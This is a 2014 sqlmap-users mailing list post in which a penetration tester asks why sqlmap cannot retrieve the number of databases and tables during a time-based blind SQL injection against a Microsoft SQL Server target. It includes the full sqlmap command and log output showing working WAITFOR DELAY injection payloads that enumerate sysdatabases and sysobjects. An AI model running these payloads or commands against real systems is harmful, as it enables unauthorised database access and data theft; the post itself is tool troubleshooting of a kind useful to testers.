[sqlmap-users] number of databases/tables problems

Tue, 23 Sep 2014 07:28:12 -0700 

Hi everybody

I'm doing a Pentest and I'm able to do a time based blind sql injection
on a very big database.

It takes some time, but that's fine for now. But sqlmap is failing when
it comes to retrieving the *number of [databases, tables, columns,
whatever]*:

$ /opt/sqlmap-dev/sqlmap.py -r http_req1_v2.txt -p "redactedParameter"
--user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0)
Gecko/20100101 Firefox/32.0" --level=5 --risk=3 --dbms=MSSQL
--os=Windows --suffix="; --" --prefix="';" --technique=T -v 3
--time-sec=2 --proxy socks5://localhost:5050 --dbs -o
[...snip...]
[11:57:49] [INFO] confirming Microsoft SQL Server
[11:57:49] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.X.XXXXX (redacted)
back-end DBMS: Microsoft SQL Server 2008
[11:57:49] [INFO] fetching database names
[11:57:49] [INFO] fetching number of databases
[11:57:49] [WARNING] multi-threading is considered unsafe in time-based
data retrieval. Going to switch it off automatically
[11:57:49] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
master..sysdatabases),1,1))>51) WAITFOR DELAY '0:0:2'; --
[11:57:49] [WARNING] time-based comparison requires larger statistical
model, please wait..............................
[11:58:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
master..sysdatabases),1,1))>54) WAITFOR DELAY '0:0:2'; --
[11:58:25] [WARNING] it is very important not to stress the network
adapter during usage of time-based payloads to prevent potential errors
[11:58:55] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
master..sysdatabases),1,1))>56) WAITFOR DELAY '0:0:2'; --
[11:59:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
master..sysdatabases),1,1))>57) WAITFOR DELAY '0:0:2'; --
[11:59:55] [INFO] retrieved:
[11:59:55] [DEBUG] performed 4 queries in 126.19 seconds
[11:59:55] [WARNING] in case of continuous data retrieval problems you
are advised to try a switch '--no-cast' or switch '--hex'
[11:59:55] [ERROR] unable to retrieve the number of databases

However, for the *database names* sqlmap will continue with the
DB_NAME(X) technique. Right now it is dumping out all the different
database names, which works fine:

[15:08:34] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
ISNULL(CAST(DB_NAME(110) AS NVARCHAR(4000)),CHAR(32))),16,1))!=109)
WAITFOR DELAY '0:0:2'; --

Because I got many of the following errors (and the occurence of the
error is random), I patched the time delay in the python code to be
fixed to 2 seconds (maybe you want to have an option for that):

[15:03:14] [ERROR] invalid character detected. retrying..
[15:03:14] [WARNING] increasing time delay to 3 seconds

That works fine and I get good results. However, when I try to dump
table names now (from one of the known databases) with the -D DB_NAME
and --tables switch, it is again failing to retrieve the number of tables:

[14:51:53] [INFO] fetching tables for database: DB_NAME
[14:51:53] [INFO] fetching number of tables for database 'DB_NAME'
[14:51:53] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects
WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>66)
WAITFOR DELAY '0:0:10'; --
[14:51:53] [WARNING] time-based comparison requires larger statistical
model, please wait..............................
[14:52:26] [CRITICAL] considerable lagging has been detected in
connection response(s). Please use as high value for option '--time-sec'
as possible (e.g. 10 or more)
[14:52:56] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects
WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>97)
WAITFOR DELAY '0:0:10'; --
[14:52:56] [WARNING] it is very important not to stress the network
adapter during usage of time-based payloads to prevent potential errors
[14:53:26] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects
WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>101)
WAITFOR DELAY '0:0:10'; --
[14:54:56] [INFO] retrieved:
[14:54:56] [DEBUG] performed 5 queries in 183.70 seconds
[...]
[14:57:27] [INFO] retrieved:
[14:57:27] [DEBUG] performed 5 queries in 150.30 seconds
[...]
[14:59:57] [INFO] retrieved:
[14:59:57] [DEBUG] performed 5 queries in 150.26 seconds
[14:59:57] [WARNING] unable to retrieve the number of tables for
database 'DB_NAME'
[14:59:57] [CRITICAL] unable to retrieve the tables for any database

Any suggestions? Using higher --time-sec, --hex or --no-cast didn't
help. Using --start and --stop also didn't work. I can't get any data
out of it like this.

Best regards,
floyd

------------------------------------------------------------------------------
Meet PCI DSS 3.0 Compliance Requirements with EventLog Analyzer
Achieve PCI DSS 3.0 Compliant Status with Out-of-the-box PCI DSS Reports
Are you Audit-Ready for PCI DSS 3.0 Compliance? Download White paper
Comply to PCI DSS 3.0 Requirement 10 and 11.5 with EventLog Analyzer
http://pubads.g.doubleclick.net/gampad/clk?id=154622311&iu=/4140/ostg.clktrk
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to